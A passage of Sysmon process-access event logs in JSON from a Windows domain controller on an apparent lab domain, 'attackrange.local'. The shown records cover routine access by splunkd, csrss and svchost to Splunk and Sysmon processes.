AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3769,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.925\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FFB-5F25-0000-0010E0B80500}\r\nTargetProcessId: 3060\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.925","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FFB-5F25-0000-0010E0B80500}","TargetProcessId":"3060","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3770,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.925\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FFB-5F25-0000-0010E0B80500}\r\nTargetProcessId: 3060\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.925","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FFB-5F25-0000-0010E0B80500}","TargetProcessId":"3060","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3771,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.925\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.925","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3772,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.925\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.925","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3773,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.925\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.925","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3774,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.925\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.925","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3775,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.925\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.925","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3776,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.925\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.925","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
